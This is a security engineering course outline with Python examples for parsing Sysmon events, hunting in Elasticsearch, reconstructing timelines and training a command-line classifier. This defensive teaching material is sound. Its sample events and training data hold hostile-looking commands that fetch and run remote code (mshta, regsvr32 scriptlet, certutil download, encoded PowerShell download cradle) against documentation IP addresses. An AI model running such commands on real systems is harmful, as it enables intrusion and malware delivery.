Security + Cloud + Machine Learning For Security Engineers

This course is designed to give an end-to-end picture of what is actually possible with publicly available tools: collecting events, analyzing them, and building machine learning models on top of them. It also covers event hunting and behavioral telemetry collection on Windows machines. Sysmon, which the examples use, is deployed in real enterprise environments despite its limitations, and the collection engines behind SIEM/EDR products fundamentally start from the same concepts as Sysmon, which makes it a very useful tool for teaching. The course also covers how a working environment can be built when expensive EDR products are hard to adopt, and what practical constraints that entails. Since SIEM and EDR products conceptually use similar methods for event collection, analysis, and preparation of data for the machine learning stage, the course is also a suitable way to study the overall concepts of SIEM, EDR, and threat hunting.

Chapter 1: APT/Threat Intelligence/MITRE ATT&CK Matrix/Threat Analysis

  • Objectives:
    • Understanding the current APT landscape and threat intelligence
    • Understanding the threat modelling approach with the MITRE ATT&CK Matrix
    • Investigating real-world malware/APT attacks and mapping them to the MITRE ATT&CK Matrix for deeper understanding
Session   | Duration | Name                | Description
Session 1 | 0.5 hour | Introduction        | Introduction, overview of the course, and exercise preparation
Session 1 | 0.3 hour | Threat Intelligence | APT vs commodity malware
Session 1 | 0.3 hour | Threat Analysis     | PE vs non-PE / living-off-the-land attacks
Session 1 | 0.3 hour | Threat Modelling    | MITRE ATT&CK Matrix
Session 1 | Homework | Exercise            | Malware sample analysis

Chapter 2: Endpoint - Windows Events/Telemetry Collection/Event Hunting

  • Objectives:
    • Understanding Windows event collection methods
      • Learning to use basic Windows event tools (focusing on PowerShell cmdlets)
    • Learning Windows event hunting
      • Based on our knowledge of the recent threat landscape, hunting for the Windows events that are actually useful
Session   | Duration | Name                    | Description
Session 2 | 2 hours  | Windows Events          | Windows Events: concepts and tools
Session 2 | Homework | Exercise                | Collect Windows events from test systems
Session 3 | 2 hours  | Advanced Windows Events | PowerShell/WMI/Sysmon/AMSI
Session 3 | Homework | Exercise                | Run and analyze PowerShell malware with various sensors
Session 4 | 2 hours  | Exercise                | Windows event hunting and investigations
Session 4 | Homework | Exercise                | Run various malware samples and find the useful events
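The collection-and-hunting loop of Sessions 2 to 4 reduces to three steps: export Sysmon records (for example with `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1}` and `.ToXml()` on each record), flatten the XML into a field dictionary, and run behavioral rules over the fields. The following Python is an added example, not course material and not Sysmon's own code. The events, host names, user names and the rule set are constructed for illustration, and `sysmon_xml()` is a helper that builds test records in the Sysmon EventID 1 layout; the field names (`Image`, `CommandLine`, `ParentImage`, `UtcTime`) are the real Sysmon ones.

```python
import base64
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath
from xml.sax.saxutils import escape

# Namespace of Windows event XML, as returned by EventLogRecord.ToXml() / Get-WinEvent.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def parse_sysmon_event(xml_text):
    """Flatten one Sysmon event into a dict: System fields plus every EventData <Data Name=...> entry."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    event = {
        "EventID": int(system.findtext("e:EventID", namespaces=NS)),
        "Computer": system.findtext("e:Computer", namespaces=NS),
    }
    for data in root.findall("e:EventData/e:Data", NS):
        event[data.get("Name")] = data.text or ""
    return event


def basename(path):
    """Lower-cased file name of a Windows path ('' when the field is absent)."""
    return PureWindowsPath(path).name.lower() if path else ""


OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
# powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)(?:\s|$)")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
REMOTE_URL = re.compile(r"(?i)https?://")

# (rule name, predicate over a flattened EventID 1 record); list order fixes the output order.
RULES = [
    ("office_spawns_script_host", lambda ev: basename(ev.get("ParentImage")) in OFFICE_PARENTS
                                             and basename(ev.get("Image")) in SCRIPT_HOSTS),
    ("powershell_encoded_command", lambda ev: basename(ev.get("Image")) in POWERSHELL
                                              and bool(ENC_FLAG.search(ev.get("CommandLine", "")))),
    ("powershell_hidden_window", lambda ev: basename(ev.get("Image")) in POWERSHELL
                                            and bool(HIDDEN_WINDOW.search(ev.get("CommandLine", "")))),
    ("lolbin_with_remote_url", lambda ev: basename(ev.get("Image")) in LOLBINS
                                          and bool(REMOTE_URL.search(ev.get("CommandLine", "")))),
]


def hunt(event):
    """Names of the rules a process-creation (EventID 1) record triggers; other event types yield []."""
    if event.get("EventID") != 1:
        return []
    return [name for name, predicate in RULES if predicate(event)]


# --- constructed test data (not real telemetry) -----------------------------------
def sysmon_xml(event_id, computer, data):
    """Build a Sysmon-shaped event XML string from a field dict."""
    fields = "".join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><Provider Name="Microsoft-Windows-Sysmon"/>'
            f"<EventID>{event_id}</EventID><Computer>{computer}</Computer></System>"
            f"<EventData>{fields}</EventData></Event>")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode("IEX (New-Object Net.WebClient)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    sysmon_xml(1, "ws01.corp.example", {"UtcTime": "2024-03-12 09:14:05.117", "Image": PS,
                                        "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}",
                                        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                                        "User": r"CORP\alice"}),
    sysmon_xml(1, "ws01.corp.example", {"UtcTime": "2024-03-12 09:14:06.002",
                                        "Image": r"C:\Windows\System32\svchost.exe",
                                        "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
                                        "ParentImage": r"C:\Windows\System32\services.exe",
                                        "User": r"NT AUTHORITY\SYSTEM"}),
    sysmon_xml(1, "ws02.corp.example", {"UtcTime": "2024-03-12 09:20:41.450",
                                        "Image": r"C:\Windows\System32\mshta.exe",
                                        "CommandLine": "mshta.exe http://198.51.100.7/update.hta",
                                        "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\bob"}),
    # EventID 3 (network connection) is not a process creation, so no rule fires on it.
    sysmon_xml(3, "ws01.corp.example", {"UtcTime": "2024-03-12 09:14:07.300", "Image": PS,
                                        "DestinationIp": "198.51.100.7", "DestinationPort": "443"}),
]

if __name__ == "__main__":
    for xml_text in SAMPLE_EVENTS:
        ev = parse_sysmon_event(xml_text)
        print(ev["EventID"], ev["Computer"], basename(ev.get("Image")), hunt(ev))
```

The parent/child rule is the one worth keeping: `-w hidden` and `-enc` are trivial for an attacker to drop or obfuscate, so command-line string matching is a starting point for the hunt, not a detection you can rely on.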

Chapter 3: Cloud + Threat Hunting

  • Objectives:
    • Understanding cloud storage and distributed computing technology
    • Acquiring and storing telemetry data from Windows events
    • Performing threat hunting on the collected telemetry data sets, and understanding the methodology and its limitations
Session   | Duration | Name     | Description
Session 5 | 2 hours  | Cloud    | Introduction to cloud storage and distributed processing platforms (Hadoop/Spark/Azure Data Lake/ElasticSearch/Kibana)
Session 5 | Homework | Exercise | Basic exercises with Hadoop/Spark/ADL
Session 6 | 2 hours  | Exercise | Telemetry collection and threat hunting with ElasticSearch and Kibana: set up an ElasticSearch/Kibana environment and hunt threats
Session 6 | Homework | Exercise | Use the ES/Kibana installation and exercise basic tools and queries
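Session 6's "collect telemetry, then hunt in ElasticSearch/Kibana" step has two halves that are easy to get wrong: shaping the documents so Kibana's security views understand them, and sending them in the format the `_bulk` API expects. The following Python is an added example, not course material or Elastic code. It maps flattened Sysmon EventID 1 records to ECS field names, builds the NDJSON bulk body, and composes a Query DSL hunt; `matches()` is a minimal offline stand-in for the cluster so the query can be checked without one (it is not Elasticsearch's query engine: it compares ISO timestamps as strings, which only works because both sides use the same format). The index name `sysmon-2024.03` and the events are constructed.

```python
import json
from datetime import datetime, timezone
from pathlib import PureWindowsPath


def to_ecs(ev):
    """Map a flattened Sysmon EventID 1 record to ECS field names.
    process.name and process.parent.name are lower-cased on purpose: keyword fields match exactly,
    so 'WINWORD.EXE' and 'winword.exe' would otherwise be two different values in a terms query."""
    ts = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f").replace(tzinfo=timezone.utc)
    return {
        "@timestamp": ts.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + "Z",
        "event": {"code": str(ev["EventID"]), "provider": "Microsoft-Windows-Sysmon"},
        "host": {"name": ev["Computer"]},
        "user": {"name": ev.get("User", "")},
        "process": {
            "executable": ev["Image"],
            "name": PureWindowsPath(ev["Image"]).name.lower(),
            "command_line": ev["CommandLine"],
            "parent": {"executable": ev["ParentImage"],
                       "name": PureWindowsPath(ev["ParentImage"]).name.lower()},
        },
    }


def bulk_body(index, docs):
    """NDJSON body for POST /_bulk: one action line before each document, every line newline-terminated
    (send it with Content-Type: application/x-ndjson; a missing final newline is rejected)."""
    lines = []
    for doc in docs:
        lines.append(json.dumps({"index": {"_index": index}}))
        lines.append(json.dumps(doc))
    return "\n".join(lines) + "\n"


def hunt_query(parent_names, child_names, start, end):
    """Query DSL: process creations where one of parent_names spawned one of child_names in a time range."""
    return {"query": {"bool": {"filter": [
                {"term": {"event.code": "1"}},
                {"terms": {"process.parent.name": parent_names}},
                {"terms": {"process.name": child_names}},
                {"range": {"@timestamp": {"gte": start, "lte": end}}}]}},
            "sort": [{"@timestamp": "asc"}], "size": 100}


def get_path(doc, dotted):
    for part in dotted.split("."):
        doc = doc.get(part) if isinstance(doc, dict) else None
    return doc


def matches(doc, query):
    """Offline evaluator for the term/terms/range filter clauses used above (test stand-in for the cluster)."""
    for clause in query["query"]["bool"]["filter"]:
        (kind, body), = clause.items()
        (field, cond), = body.items()
        value = get_path(doc, field)
        if kind == "term" and value != cond:
            return False
        if kind == "terms" and value not in cond:
            return False
        if kind == "range" and not (cond["gte"] <= value <= cond["lte"]):
            return False
    return True


OFFICE = ["winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"]
SCRIPT_HOSTS = ["powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"]

# --- constructed events (not real telemetry) --------------------------------------
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "ws01.corp.example", "UtcTime": "2024-03-12 09:14:05.117", "User": r"CORP\alice",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoP -W Hidden -File C:\Users\alice\AppData\Local\Temp\stage.ps1",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"EventID": 1, "Computer": "ws01.corp.example", "UtcTime": "2024-03-12 09:14:06.002", "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs -p -s Schedule",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 1, "Computer": "ws02.corp.example", "UtcTime": "2024-03-11 18:02:11.000", "User": r"CORP\bob",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
]


def run_hunt(events, start="2024-03-12T00:00:00.000Z", end="2024-03-12T23:59:59.999Z"):
    """Normalize, then apply the hunt query locally; returns the matching ECS documents."""
    docs = [to_ecs(ev) for ev in events]
    query = hunt_query(OFFICE, SCRIPT_HOSTS, start, end)
    return [d for d in docs if matches(d, query)]


if __name__ == "__main__":
    print(bulk_body("sysmon-2024.03", [to_ecs(ev) for ev in SAMPLE_EVENTS]))
    for hit in run_hunt(SAMPLE_EVENTS):
        print(hit["@timestamp"], hit["process"]["parent"]["name"], "->", hit["process"]["command_line"])
```

The third event (Excel spawning cmd.exe on the previous day) is excluded only by the time range, which is the point of putting the range into the filter rather than eyeballing it in Kibana afterwards: the same query body can be scheduled as a detection once it is known to work on the stored data.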

Chapter 4: Heuristics

  • Objectives:
    • Understanding the heuristic approach to malware/APT detection and its limitations
    • Introduction to the data science approach to real-world problems
Session   | Duration | Name         | Description
Session 7 | 2 hours  | Data Science | Machine learning algorithms
Session 7 | Homework | Exercise     | Basic examples
Session 8 | 2 hours  | Exercise     | Timeline reconstruction (Python + Jupyter Notebook)
Session 8 | Homework | Exercise     | Construct timelines for various time frames to find and analyze malicious activities
Session 9 | 2 hours  | Exercise     | Command line analysis
Session 9 | Homework | Exercise     | Build a command line parser for basic analysis
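Sessions 8 and 9 (timeline reconstruction, then a command line parser) are the two pieces an analyst combines when zooming in on one alert: order mixed Sysmon event types by `UtcTime`, cut a window around the pivot event, and break the command lines in that window into options and values, decoding `-EncodedCommand` on the way. The following Python is an added example, not course material. The events are constructed (the encoded command is produced in the block itself so that the decode can be checked), the tokenizer is a deliberate simplification of Windows argument parsing (quotes are dropped, escaped quotes are not handled), and the option prefixes it recognizes (`-`, `/`) are an assumption that fits cmd.exe and powershell.exe but not every program.

```python
import base64
import binascii
from datetime import datetime


def tokenize_windows(cmd):
    """Split on whitespace, keeping double-quoted runs together (quotes are dropped;
    backslash-escaped quotes are not handled: a simplification of Windows argv parsing)."""
    tokens, current, in_quote = [], [], False
    for ch in cmd:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if current:
                tokens.append("".join(current))
                current = []
        else:
            current.append(ch)
    if current:
        tokens.append("".join(current))
    return tokens


def is_encoded_flag(name):
    """powershell.exe accepts -e, -ec and any prefix of -EncodedCommand (-en, -enc, ...)."""
    return name in ("e", "ec") or (len(name) >= 2 and "encodedcommand".startswith(name))


def decode_encoded_command(value):
    """-EncodedCommand carries base64 of the UTF-16LE script text; None when it does not decode."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def parse_command_line(cmd):
    """Executable, positional args, -option/value pairs and the decoded script (if any)."""
    tokens = tokenize_windows(cmd)
    result = {"executable": tokens[0] if tokens else "", "args": [], "options": {}, "decoded_command": None}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith(("-", "/")):
            name, value = tok[1:].lower(), None
            if i + 1 < len(tokens) and not tokens[i + 1].startswith(("-", "/")):
                value = tokens[i + 1]
                i += 1
            result["options"][name] = value
            if is_encoded_flag(name) and value:
                result["decoded_command"] = decode_encoded_command(value)
        else:
            result["args"].append(tok)
        i += 1
    return result


def parse_utc(s):
    """Sysmon UtcTime strings look like '2024-03-12 09:14:05.117'."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def summarize(ev):
    eid = ev["EventID"]
    if eid == 1:
        return f"{ev['Image']} <- {ev['ParentImage']}"
    if eid == 3:
        return f"{ev['Image']} -> {ev['DestinationIp']}:{ev['DestinationPort']}"
    if eid == 11:
        return f"{ev['Image']} wrote {ev['TargetFilename']}"
    return f"EventID {eid}"


def build_timeline(events):
    """Order mixed Sysmon events by UtcTime; offset_s is seconds since the earliest event."""
    rows = sorted(events, key=lambda ev: parse_utc(ev["UtcTime"]))
    t0 = parse_utc(rows[0]["UtcTime"])
    return [{"time": parse_utc(ev["UtcTime"]), "offset_s": (parse_utc(ev["UtcTime"]) - t0).total_seconds(),
             "host": ev["Computer"], "event_id": ev["EventID"], "summary": summarize(ev)} for ev in rows]


def around(timeline, pivot_index, seconds):
    """Rows within +/- seconds of a pivot row: the usual way to zoom in on one alert."""
    t = timeline[pivot_index]["time"]
    return [row for row in timeline if abs((row["time"] - t).total_seconds()) <= seconds]


# --- constructed events (not real telemetry), deliberately out of order ------------
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
ENCODED = base64.b64encode("IEX (New-Object Net.WebClient)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 3, "Computer": "ws01", "UtcTime": "2024-03-12 09:14:07.300", "Image": PS,
     "DestinationIp": "198.51.100.7", "DestinationPort": "443"},
    {"EventID": 1, "Computer": "ws01", "UtcTime": "2024-03-12 09:14:05.117", "Image": PS,
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}", "ParentImage": WORD},
    {"EventID": 1, "Computer": "ws01", "UtcTime": "2024-03-12 10:30:03.000", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Computer": "ws01", "UtcTime": "2024-03-12 09:14:03.000", "Image": WORD,
     "CommandLine": f'"{WORD}" /n "C:\\Users\\alice\\Downloads\\invoice.docm"', "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 11, "Computer": "ws01", "UtcTime": "2024-03-12 09:14:09.880", "Image": PS,
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\upd.exe"},
]

if __name__ == "__main__":
    timeline = build_timeline(SAMPLE_EVENTS)
    pivot = next(i for i, row in enumerate(timeline) if row["event_id"] == 1 and "powershell" in row["summary"].lower())
    for row in around(timeline, pivot, 60):
        print(f"+{row['offset_s']:8.3f}s  {row['host']}  id={row['event_id']:<3} {row['summary']}")
    print(parse_command_line(SAMPLE_EVENTS[1]["CommandLine"])["decoded_command"])
```

The 60-second window drops the unrelated notepad.exe launch an hour later and keeps the Word launch, the encoded PowerShell, its outbound connection and the file it wrote, which is the chain an analyst needs to see together; the decoded `-Enc` payload is then what gets pasted into the report rather than the base64 blob.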

Chapter 5: Data Science

  • Objectives:
    • Applying various data science methodologies to security problems (focusing on machine telemetry)
    • Understanding the importance of data clean-up
    • Understanding the process of feature set selection and the feature extraction methods
Session    | Duration | Name     | Description
Session 10 | 2 hours  | Exercise | Introduction to machine learning methods and concepts, with exercises
Session 10 | Homework | Exercise | Basic data science examples
Session 11 | 2 hours  | Exercise | Building machine learning models
Session 11 | Homework | Exercise | Basic security data science examples
Session 12 | 2 hours  | Exercise | Building machine learning models
Session 12 | Homework | Exercise | Intermediate security data science examples
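The Chapter 5 objectives (clean-up, feature extraction and selection, then a model) form one pipeline, and the order matters: normalization and de-duplication happen before features are computed, scaling happens before training so that a raw length in the hundreds does not swamp 0/1 flags, and feature selection is read off the trained weights. The following Python is an added example, not course material. It uses a hand-written logistic regression instead of scikit-learn so that it runs with no dependencies; the labelled command lines are constructed and far too few for a real model (the base64 strings are arbitrary), so the point is the pipeline and the checks around it, not the classifier's accuracy on anything beyond its own samples.

```python
import math
import re


def clean(cmd):
    """Normalization before feature extraction: case, whitespace, and the per-user path segment,
    so the same program under two user profiles does not look like two different command lines."""
    cmd = re.sub(r"\s+", " ", cmd.strip().lower())
    return re.sub(r"c:\\users\\[^\\ ]+", r"c:\\users\\<user>", cmd)


B64_TOKEN = re.compile(r"^[a-z0-9+/]{20,}={0,2}$")     # long base64-looking token (input is lower-cased)
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)(?:\s|$)")
URL = re.compile(r"https?://")
FEATURE_NAMES = ["length", "entropy", "non_alnum_ratio", "longest_token",
                 "token_count", "has_url", "has_b64_token", "has_encoded_flag"]


def entropy(s):
    """Shannon entropy in bits per character."""
    n, counts = len(s), {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def features(cmd):
    """Numeric feature vector for one command line, in FEATURE_NAMES order (clean-up applied first)."""
    cmd = clean(cmd)
    tokens = cmd.split(" ")
    return [float(len(cmd)), entropy(cmd),
            sum(1 for ch in cmd if not ch.isalnum() and ch != " ") / max(len(cmd), 1),
            float(max(len(t) for t in tokens)), float(len(tokens)),
            1.0 if URL.search(cmd) else 0.0,
            1.0 if any(B64_TOKEN.match(t) for t in tokens) else 0.0,
            1.0 if ENC_FLAG.search(cmd) else 0.0]


def fit_scaler(rows):
    """Per-feature (min, max) from the training set only; never refit on data you predict on."""
    return [(min(col), max(col)) for col in zip(*rows)]


def scale(rows, scaler):
    return [[(v - lo) / (hi - lo) if hi > lo else 0.0 for v, (lo, hi) in zip(row, scaler)] for row in rows]


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def train_logreg(X, y, lr=0.5, epochs=3000):
    """Logistic regression by full-batch gradient descent; returns (weights, bias)."""
    d = len(X[0])
    w, b = [0.0] * d, 0.0
    for _ in range(epochs):
        grad_w, grad_b = [0.0] * d, 0.0
        for row, label in zip(X, y):
            err = sigmoid(b + sum(wi * xi for wi, xi in zip(w, row))) - label
            grad_w = [g + err * xi for g, xi in zip(grad_w, row)]
            grad_b += err
        w = [wi - lr * g / len(X) for wi, g in zip(w, grad_w)]
        b -= lr * grad_b / len(X)
    return w, b


def fit(samples):
    """samples: (command_line, label) pairs, label 1 = malicious. Exact duplicates after clean-up are dropped
    so a noisy log with one command repeated a thousand times does not dominate the training set."""
    seen, kept = set(), []
    for cmd, label in samples:
        key = clean(cmd)
        if key not in seen:
            seen.add(key)
            kept.append((cmd, label))
    X = [features(c) for c, _ in kept]
    scaler = fit_scaler(X)
    return train_logreg(scale(X, scaler), [float(l) for _, l in kept]), scaler


def predict_proba(model, scaler, cmd):
    w, b = model
    x = scale([features(cmd)], scaler)[0]
    return sigmoid(b + sum(wi * xi for wi, xi in zip(w, x)))


def top_features(model, k=3):
    """Feature selection aid: the k feature names with the largest absolute weight."""
    w, _ = model
    return [name for name, _ in sorted(zip(FEATURE_NAMES, w), key=lambda p: -abs(p[1]))[:k]]


def training_accuracy(model, scaler, samples):
    return sum((predict_proba(model, scaler, c) >= 0.5) == bool(l) for c, l in samples) / len(samples)


# --- constructed, labelled command lines (not real telemetry) ----------------------
TRAINING_SAMPLES = [
    (r"powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA", 1),
    (r"cmd.exe /c powershell -w hidden -nop -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AA==", 1),
    (r"mshta.exe http://198.51.100.7/update.hta", 1),
    (r"regsvr32.exe /s /n /u /i:http://203.0.113.5/file.sct scrobj.dll", 1),
    (r"certutil.exe -urlcache -split -f http://198.51.100.7/x.exe C:\Users\bob\AppData\Local\Temp\x.exe", 1),
    (r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule", 0),
    (r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\alice\Documents\report.docx"', 0),
    (r'C:\Windows\System32\cmd.exe /c "dir C:\Users\bob\Desktop"', 0),
    (r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1", 0),
    (r"C:\Windows\System32\wbem\WmiPrvSE.exe", 0),
    (r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US', 0),
    (r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule", 0),   # duplicate: removed by fit()
]

if __name__ == "__main__":
    model, scaler = fit(TRAINING_SAMPLES)
    print("training accuracy:", training_accuracy(model, scaler, TRAINING_SAMPLES))
    print("strongest features:", top_features(model))
    print(predict_proba(model, scaler, "powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"))
```

Two things to notice when scaling this up to real telemetry: the benign `powershell.exe -ExecutionPolicy Bypass -File ...` line is in the training set precisely so that the model cannot learn "powershell means malicious", and the `has_*` indicator features carry most of the signal, which is exactly the heuristic approach of Chapter 4 re-expressed as features; a model trained this way inherits those heuristics' blind spots as well as their coverage.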

Registration Information